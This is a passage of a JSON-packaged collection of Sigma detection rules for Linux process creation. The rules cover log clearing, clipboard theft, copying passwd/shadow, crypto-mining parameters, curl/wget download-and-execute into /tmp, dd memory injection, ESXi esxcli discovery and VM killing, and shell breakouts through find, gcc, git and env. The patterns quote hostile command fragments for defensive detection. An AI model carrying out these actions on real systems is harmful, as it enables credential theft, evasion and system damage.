selection_unique_other:\n        CommandLine|contains:\n            - ' > /var/log/syslog'\n            - ' >/var/log/syslog'\n            - ' >| /var/log/syslog'  # redirection empties w spacing, noclobber\n            - ': > /var/log/syslog'\n            - ':> /var/log/syslog'\n            - ':>/var/log/syslog'\n            - '>|/var/log/syslog'\n    selection_unique_journalctl:\n        CommandLine|contains:\n            - 'journalctl --vacuum'\n            - 'journalctl --rotate' # archives current journal files and creates new empty ones\n    condition: (selection_file and 1 of selection_command_*) or 1 of selection_unique_*\nfalsepositives:\n    - Log rotation.\n    - Maintenance.\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml",
    "content": "title: Clipboard Collection with Xclip Tool\nid: ec127035-a636-4b9a-8555-0efd4e59f316\nstatus: test\ndescription: |\n    Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed.\n    Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\nreferences:\n    - https://www.packetlabs.net/posts/clipboard-data-security/\nauthor: Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC\ndate: 2021-10-15\nmodified: 2022-09-15\ntags:\n    - attack.collection\n    - attack.t1115\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|contains: 'xclip'\n        CommandLine|contains|all:\n            - '-sel'\n            - 'clip'\n            - '-o'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of xclip tools.\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_cp_passwd_or_shadow_tmp.yml",
    "content": "title: Copy Passwd Or Shadow From TMP Path\nid: fa4aaed5-4fe0-498d-bbc0-08e3346387ba\nstatus: test\ndescription: Detects when the file \"passwd\" or \"shadow\" is copied from tmp path\nreferences:\n    - https://blogs.blackberry.com/\n    - https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-01-31\ntags:\n    - attack.credential-access\n    - attack.t1552.001\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection_img:\n        Image|endswith: '/cp'\n    selection_path:\n        CommandLine|contains: '/tmp/'\n    selection_file:\n        CommandLine|contains:\n            - 'passwd'\n            - 'shadow'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_crontab_enumeration.yml",
    "content": "title: Crontab Enumeration\nid: 403ed92c-b7ec-4edd-9947-5b535ee12d46\nstatus: test\ndescription: Detects usage of crontab to list the tasks of the user\nreferences:\n    - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html\n    - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/\n    - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection\n    - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-06-02\ntags:\n    - attack.discovery\n    - attack.t1007\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/crontab'\n        CommandLine|contains: ' -l'\n    condition: selection\nfalsepositives:\n    - Legitimate use of crontab\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml",
    "content": "title: Remove Scheduled Cron Task/Job\nid: c2e234de-03a3-41e1-b39a-1e56dc17ba67\nstatus: test\ndescription: |\n    Detects usage of the 'crontab' utility to remove the current crontab.\n    This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible\nreferences:\n    - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-15\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: 'crontab'\n        CommandLine|contains: ' -r'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml",
    "content": "title: Linux Crypto Mining Indicators\nid: 9069ea3c-b213-4c52-be13-86506a227ab1\nstatus: test\ndescription: Detects command line parameters or strings often used by crypto miners\nreferences:\n    - https://www.poolwatch.io/coin/monero\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-10-26\nmodified: 2022-12-25\ntags:\n    - attack.impact\n    - attack.t1496\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - ' --cpu-priority='\n            - '--donate-level=0'\n            - ' -o pool.'\n            - ' --nicehash'\n            - ' --algo=rx/0 '\n            - 'stratum+tcp://'\n            - 'stratum+udp://'\n            # Sub process started by xmrig - the most popular Monero crypto miner - unknown if this causes any false positives\n            - 'sh -c /sbin/modprobe msr allow_writes=on'\n            # base64 encoded: --donate-level=\n            - 'LS1kb25hdGUtbGV2ZWw9'\n            - '0tZG9uYXRlLWxldmVsP'\n            - 'tLWRvbmF0ZS1sZXZlbD'\n            # base64 encoded: stratum+tcp:// and stratum+udp://\n            - 'c3RyYXR1bSt0Y3A6Ly'\n            - 'N0cmF0dW0rdGNwOi8v'\n            - 'zdHJhdHVtK3RjcDovL'\n            - 'c3RyYXR1bSt1ZHA6Ly'\n            - 'N0cmF0dW0rdWRwOi8v'\n            - 'zdHJhdHVtK3VkcDovL'\n    condition: selection\nfalsepositives:\n    - Legitimate use of crypto miners\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_curl_usage.yml",
    "content": "title: Curl Usage on Linux\nid: ea34fb97-e2c4-4afb-810f-785e4459b194\nstatus: test\ndescription: Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server\nreferences:\n    - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-15\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/curl'\n    condition: selection\nfalsepositives:\n    - Scripts created by developers and admins\n    - Administrative activity\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_curl_wget_exec_tmp.yml",
    "content": "title: Suspicious Download and Execute Pattern via Curl/Wget\nid: a2d9e2f3-0f43-4c7a-bcd9-9acfc0d723aa\nstatus: experimental\ndescription: |\n    Detects suspicious use of command-line tools such as curl or wget to download remote\n    content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by\n    immediate execution, indicating potential malicious activity. This pattern is commonly used\n    by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks.\nreferences:\n    - https://gtfobins.github.io/gtfobins/wget/\n    - https://gtfobins.github.io/gtfobins/curl/\nauthor: Aayush Gupta\ndate: 2025-06-17\ntags:\n    - attack.execution\n    - attack.t1059.004\n    - attack.t1203\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_downloader:\n        CommandLine|contains:\n            - '/curl'\n            - '/wget'\n    selection_tmp:\n        CommandLine|contains:\n            - '/tmp/'\n            - '/dev/shm/'\n    selection_executor:\n        CommandLine|contains: 'sh -c'\n    condition: all of selection_*\nfalsepositives:\n    - System update scripts using temporary files\n    - Installer scripts or automated provisioning tools\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml",
    "content": "title: DD File Overwrite\nid: 2953194b-e33c-4859-b9e8-05948c167447\nstatus: test\ndescription: Detects potential overwriting and deletion of a file using DD.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-2---macoslinux---overwrite-file-with-dd\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC\ndate: 2021-10-15\nmodified: 2022-07-07\ntags:\n    - attack.impact\n    - attack.t1485\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection1:\n        Image:\n            - '/bin/dd'\n            - '/usr/bin/dd'\n    selection2:\n        CommandLine|contains: 'of='\n    selection3:\n        CommandLine|contains:\n            - 'if=/dev/zero'\n            - 'if=/dev/null'\n    condition: all of selection*\nfalsepositives:\n    - Any user deleting files that way.\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_dd_process_injection.yml",
    "content": "title: Potential Linux Process Code Injection Via DD Utility\nid: 4cad6c64-d6df-42d6-8dae-eb78defdc415\nstatus: test\ndescription: Detects the injection of code by overwriting the memory map of a Linux process using the \"dd\" Linux command.\nreferences:\n    - https://www.aon.com/cyber-solutions/aon_cyber_labs/linux-based-inter-process-code-injection-without-ptrace2/\n    - https://github.com/AonCyberLabs/Cexigua/blob/34d338620afae4c6335ba8d8d499e1d7d3d5d7b5/overwrite.sh\nauthor: Joseph Kamau\ndate: 2023-12-01\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1055.009\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/dd'\n        CommandLine|contains|all:\n            - 'of='\n            - '/proc/'\n            - '/mem'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_disable_ufw.yml",
    "content": "title: Ufw Force Stop Using Ufw-Init\nid: 84c9e83c-599a-458a-a0cb-0ecce44e807a\nstatus: test\ndescription: Detects attempts to force stop the ufw using ufw-init\nreferences:\n    - https://blogs.blackberry.com/\n    - https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-01-18\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection_init:\n        CommandLine|contains|all:\n            - '-ufw-init'\n            - 'force-stop'\n    selection_ufw:\n        CommandLine|contains|all:\n            - 'ufw'\n            - 'disable'\n    condition: 1 of selection_*\nfalsepositives:\n    - Network administrators\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_doas_execution.yml",
    "content": "title: Linux Doas Tool Execution\nid: 067d8238-7127-451c-a9ec-fa78045b618b\nstatus: stable\ndescription: Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does.\nreferences:\n    - https://research.splunk.com/endpoint/linux_doas_tool_execution/\n    - https://www.makeuseof.com/how-to-install-and-use-doas/\nauthor: Sittikorn S, Teoderick Contreras\ndate: 2022-01-20\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/doas'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_env_shell_invocation.yml",
    "content": "title: Shell Invocation via Env Command - Linux\nid: bed978f8-7f3a-432b-82c5-9286a9b3031a\nstatus: test\ndescription: |\n    Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands.\nreferences:\n    - https://gtfobins.github.io/gtfobins/env/#shell\n    - https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html\nauthor: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)\ndate: 2024-09-02\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/env'\n        CommandLine|endswith:\n            - '/bin/bash'\n            - '/bin/dash'\n            - '/bin/fish'\n            - '/bin/sh'\n            - '/bin/zsh'\n    condition: selection\nfalsepositives:\n    - Github operations such as ghe-backup\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_esxcli_network_discovery.yml",
    "content": "title: ESXi Network Configuration Discovery Via ESXCLI\nid: 33e814e0-1f00-4e43-9c34-31fb7ae2b174\nstatus: test\ndescription: Detects execution of the \"esxcli\" command with the \"network\" flag in order to retrieve information about the network configuration.\nreferences:\n    - https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/\n    - https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_network.html\nauthor: Cedric Maurugeon\ndate: 2023-09-04\ntags:\n    - attack.discovery\n    - attack.execution\n    - attack.t1033\n    - attack.t1007\n    - attack.t1059.012\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        Image|endswith: '/esxcli'\n        CommandLine|contains: 'network'\n    selection_cli:\n        CommandLine|contains:\n            - ' get'\n            - ' list'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administration activities\n# Note: level can be reduced to low in some envs\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_esxcli_permission_change_admin.yml",
    "content": "title: ESXi Admin Permission Assigned To Account Via ESXCLI\nid: 9691f58d-92c1-4416-8bf3-2edd753ec9cf\nstatus: test\ndescription: Detects execution of the \"esxcli\" command with the \"system\" and \"permission\" flags in order to assign admin permissions to an account.\nreferences:\n    - https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-09-04\ntags:\n    - attack.persistence\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.t1059.012\n    - attack.t1098\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/esxcli'\n        CommandLine|contains: 'system'\n        CommandLine|contains|all:\n            - ' permission '\n            - ' set'\n            - 'Admin'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_esxcli_storage_discovery.yml",
    "content": "title: ESXi Storage Information Discovery Via ESXCLI\nid: f41dada5-3f56-4232-8503-3fb7f9cf2d60\nstatus: test\ndescription: Detects execution of the \"esxcli\" command with the \"storage\" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit.\nreferences:\n    - https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html\n    - https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html\n    - https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_storage.html\nauthor: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon\ndate: 2023-09-04\ntags:\n    - attack.discovery\n    - attack.execution\n    - attack.t1033\n    - attack.t1007\n    - attack.t1059.012\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        Image|endswith: '/esxcli'\n        CommandLine|contains: 'storage'\n    selection_cli:\n        CommandLine|contains:\n            - ' get'\n            - ' list'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administration activities\n# Note: level can be reduced to low in some envs\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_esxcli_syslog_config_change.yml",
    "content": "title: ESXi Syslog Configuration Change Via ESXCLI\nid: 38eb1dbb-011f-40b1-a126-cf03a0210563\nstatus: test\ndescription: Detects changes to the ESXi syslog configuration via \"esxcli\"\nreferences:\n    - https://support.solarwinds.com/SuccessCenter/s/article/Configure-ESXi-Syslog-to-LEM?language=en_US\n    - https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html\nauthor: Cedric Maurugeon\ndate: 2023-09-04\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1562.001\n    - attack.t1562.003\n    - attack.t1059.012\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/esxcli'\n        CommandLine|contains|all:\n            - 'system'\n            - 'syslog'\n            - 'config'\n        CommandLine|contains: ' set'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_esxcli_system_discovery.yml",
    "content": "title: ESXi System Information Discovery Via ESXCLI\nid: e80273e1-9faf-40bc-bd85-dbaff104c4e9\nstatus: test\ndescription: Detects execution of the \"esxcli\" command with the \"system\" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc.\nreferences:\n    - https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/\n    - https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html\nauthor: Cedric Maurugeon\ndate: 2023-09-04\ntags:\n    - attack.discovery\n    - attack.execution\n    - attack.t1033\n    - attack.t1007\n    - attack.t1059.012\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        Image|endswith: '/esxcli'\n        CommandLine|contains: 'system'\n    selection_cli:\n        CommandLine|contains:\n            - ' get'\n            - ' list'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_esxcli_user_account_creation.yml",
    "content": "title: ESXi Account Creation Via ESXCLI\nid: b28e4eb3-8bbc-4f0c-819f-edfe8e2f25db\nstatus: test\ndescription: Detects user account creation on ESXi system via esxcli\nreferences:\n    - https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html\nauthor: Cedric Maurugeon\ndate: 2023-08-22\ntags:\n    - attack.persistence\n    - attack.execution\n    - attack.t1136\n    - attack.t1059.012\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/esxcli'\n        CommandLine|contains|all:\n            - 'system '\n            - 'account '\n            - 'add '\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_esxcli_vm_discovery.yml",
    "content": "title: ESXi VM List Discovery Via ESXCLI\nid: 5f1573a7-363b-4114-9208-ad7a61de46eb\nstatus: test\ndescription: Detects execution of the \"esxcli\" command with the \"vm\" flag in order to retrieve information about the installed VMs.\nreferences:\n    - https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/\n    - https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_vm.html\n    - https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/\n    - https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html\nauthor: Cedric Maurugeon\ndate: 2023-09-04\ntags:\n    - attack.discovery\n    - attack.execution\n    - attack.t1033\n    - attack.t1007\n    - attack.t1059.012\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/esxcli'\n        CommandLine|contains: 'vm process'\n        CommandLine|endswith: ' list'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_esxcli_vm_kill.yml",
    "content": "title: ESXi VM Kill Via ESXCLI\nid: 2992ac4d-31e9-4325-99f2-b18a73221bb2\nstatus: test\ndescription: Detects execution of the \"esxcli\" command with the \"vm\" and \"kill\" flag in order to kill/shutdown a specific VM.\nreferences:\n    - https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/\n    - https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_vm.html\n    - https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/\n    - https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html\nauthor: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon\ndate: 2023-09-04\ntags:\n    - attack.execution\n    - attack.impact\n    - attack.t1059.012\n    - attack.t1529\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/esxcli'\n        CommandLine|contains|all:\n            - 'vm process'\n            - 'kill'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_esxcli_vsan_discovery.yml",
    "content": "title: ESXi VSAN Information Discovery Via ESXCLI\nid: d54c2f06-aca9-4e2b-81c9-5317858f4b79\nstatus: test\ndescription: Detects execution of the \"esxcli\" command with the \"vsan\" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide.\nreferences:\n    - https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html\n    - https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html\n    - https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_vsan.html\nauthor: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon\ndate: 2023-09-04\ntags:\n    - attack.discovery\n    - attack.execution\n    - attack.t1033\n    - attack.t1007\n    - attack.t1059.012\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        Image|endswith: '/esxcli'\n        CommandLine|contains: 'vsan'\n    selection_cli:\n        CommandLine|contains:\n            - ' get'\n            - ' list'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administration activities\n# Note: level can be reduced to low in some envs\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_file_and_directory_discovery.yml",
    "content": "title: File and Directory Discovery - Linux\nid: d3feb4ee-ff1d-4d3d-bd10-5b28a238cc72\nstatus: test\ndescription: |\n    Detects usage of system utilities such as \"find\", \"tree\", \"findmnt\", etc, to discover files, directories and network shares.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md\nauthor: Daniil Yugoslavskiy, oscd.community, CheraghiMilad\ndate: 2020-10-19\nmodified: 2024-12-01\ntags:\n    - attack.discovery\n    - attack.t1083\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_file_with_asterisk:\n        Image|endswith: '/file'\n        CommandLine|re: '(.){200,}' # execution of the 'file */* *>> /tmp/output.txt' will produce huge commandline\n    selection_recursive_ls:\n        Image|endswith: '/ls'\n        CommandLine|contains: '-R'\n    selection_find_execution:\n        Image|endswith: '/find'\n    selection_tree_execution:\n        Image|endswith: '/tree'\n    selection_findmnt_execution:\n        Image|endswith: '/findmnt'\n    selection_locate_execution:\n        Image|endswith: '/mlocate'\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate activities\nlevel: informational\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_file_deletion.yml",
    "content": "title: File Deletion\nid: 30aed7b6-d2c1-4eaf-9382-b6bc43e50c57\nstatus: stable\ndescription: Detects file deletion using \"rm\", \"shred\" or \"unlink\" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md\nauthor: Ömer Günal, oscd.community\ndate: 2020-10-07\nmodified: 2022-09-15\ntags:\n    - attack.defense-evasion\n    - attack.t1070.004\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith:\n            - '/rm'     # covers /rmdir as well\n            - '/shred'\n            - '/unlink'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: informational\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_find_shell_execution.yml",
    "content": "title: Shell Execution via Find - Linux\nid: 6adfbf8f-52be-4444-9bac-81b539624146\nstatus: test\ndescription: |\n    Detects the use of the find command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or exploitation attempt.\nreferences:\n    - https://gtfobins.github.io/gtfobins/find/#shell\n    - https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html\nauthor: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)\ndate: 2024-09-02\ntags:\n    - attack.discovery\n    - attack.t1083\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        Image|endswith: '/find'\n        CommandLine|contains|all:\n            - ' . '\n            - '-exec'\n    selection_cli:\n        CommandLine|contains:\n            - '/bin/bash'\n            - '/bin/dash'\n            - '/bin/fish'\n            - '/bin/sh'\n            - '/bin/zsh'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_flock_shell_execution.yml",
    "content": "title: Shell Execution via Flock - Linux\nid: 4b09c71e-4269-4111-9cdd-107d8867f0cc\nstatus: test\ndescription: |\n    Detects the use of the \"flock\" command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\nreferences:\n    - https://gtfobins.github.io/gtfobins/flock/#shell\n    - https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html\nauthor: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)\ndate: 2024-09-02\ntags:\n    - attack.discovery\n    - attack.t1083\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        Image|endswith: '/flock'\n        CommandLine|contains: ' -u '\n    selection_cli:\n        CommandLine|contains:\n            - '/bin/bash'\n            - '/bin/dash'\n            - '/bin/fish'\n            - '/bin/sh'\n            - '/bin/zsh'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_gcc_shell_execution.yml",
    "content": "title: Shell Execution GCC  - Linux\nid: 9b5de532-a757-4d70-946c-1f3e44f48b4d\nstatus: test\ndescription: |\n    Detects the use of the \"gcc\" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\nreferences:\n    - https://gtfobins.github.io/gtfobins/gcc/#shell\n    - https://gtfobins.github.io/gtfobins/c89/#shell\n    - https://gtfobins.github.io/gtfobins/c99/#shell\n    - https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html\nauthor: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)\ndate: 2024-09-02\ntags:\n    - attack.discovery\n    - attack.t1083\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        Image|endswith:\n            - '/c89'\n            - '/c99'\n            - '/gcc'\n        CommandLine|contains: '-wrapper'\n    selection_cli:\n        CommandLine|contains:\n            - '/bin/bash,-s'\n            - '/bin/dash,-s'\n            - '/bin/fish,-s'\n            - '/bin/sh,-s'\n            - '/bin/zsh,-s'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_git_shell_execution.yml",
    "content": "title: Shell Execution via Git - Linux\nid: 47b3bbd4-1bf7-48cc-84ab-995362aaa75a\nstatus: test\ndescription: |\n    Detects the use of the \"git\" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\nreferences:\n    - https://gtfobins.github.io/gtfobins/git/#shell\nauthor: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)\ndate: 2024-09-02\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        ParentImage|endswith: '/git'\n        ParentCommandLine|contains|all:\n            - ' -p '\n            - 'help'\n        CommandLine|contains:\n            - 'bash 0<&1'\n            - 'dash 0<&1'\n            - 'sh 0<&1'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_grep_os_arch_discovery.yml",
    "content": "title: OS Architecture Discovery Via Grep\nid: d27ab432-2199-483f-a297-03633c05bae6\nstatus: test\ndescription: |\n    Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of \"uname\" or \"cat /proc/cpuinfo\"\nreferences:\n    - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html\n    - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/\n    - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection\n    - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-06-02\ntags:\n    - attack.discovery\n    - attack.t1082\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_process:\n        Image|endswith: '/grep'\n    selection_architecture:\n        CommandLine|endswith:\n            - 'aarch64'\n            - 'arm'\n            - 'i386'\n            - 'i686'\n            - 'mips'\n            - 'x86_64'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_groupdel.yml",
